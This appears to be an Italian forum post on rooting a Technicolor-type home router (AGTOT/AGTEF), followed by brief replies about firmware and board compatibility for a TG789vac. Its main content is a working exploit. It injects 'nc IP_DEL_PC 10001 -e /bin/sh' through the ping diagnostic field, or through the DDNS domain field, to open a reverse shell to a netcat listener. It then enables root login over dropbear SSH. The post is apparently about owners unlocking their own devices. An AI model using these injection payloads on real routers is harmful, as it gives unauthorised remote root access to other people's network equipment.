Eccomi!
La procedura di root che mi funziona è questa (è un mix di quelle che abbiamo visto su AGTOT e AGTEF/AGTHP) :
1- Assicuratevi di non avere firewall attivi sul PC
2- Collegate il router al PC ed annotatevi l'IP che utilizza questo ultimo
3- Lanciare netcat in ascolto sul PC (esiste anche la versione windows, si scarica facilmente)
nc -lvvp 10001
"10001" è la porta TCP di ascolto, potete usare una porta alta ( 1024-65535 ) qualunque. La 10001 è quella che si trova in tanti esempi
4- Aprite la pagina di diagnostica -> Ping & Traceroute -> nella sezione "indirizzi IP" inserite:
:::::::;nc IP_DEL_PC 10001 -e /bin/sh
e lanciate il test del ping. Sul PC dovrebbe comparire la scritta "connected to IP_DEL_ROUTER"
5- adesso sul PC lanciate i comandi per attivare l'utenza root ed il servizio SSH dropbear:
passwd root
<inventatevi una password di root - va inserita e poi confermata>
uci set dropbear.@dropbear[0].PasswordAuth='on'
uci set dropbear.@dropbear[0].Interface='lan'
uci set dropbear.@dropbear[0].RootPasswordAuth='on'
uci set dropbear.@dropbear[0].RootLogin='1'
uci set dropbear.@dropbear[0].enable='1'
uci commit
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd
/etc/init.d/dropbear restart
FINE!
Se il punto 4 non funziona provate con il servizio DynDNS:
4b- Aprite pagina “Servizi WAN”, andate nella nella sezione DDNS e inserite questa stringa nel campo “Dominio”:
www.ooo.com; nc IP_DEL_PC 10001 -e /bin/sh &
Attivate il servizio DynDNS e infine salvate
mettici iinet o il firmware uno
la board e' compatibile
Sei sicuro che "TG789vac Xtream 35b" sia compatibile ? Mi sembra di avere provato senza successo.
**EDIT** Ho verificato, mi sembra che iinet ed uno utilizzino la board VANT-6 mentre questo ha la VBNT-F
servirebbe il firmware di un router con stessa board (e forse anche la chiave AES per il decrypt del file .rbi)
Help me!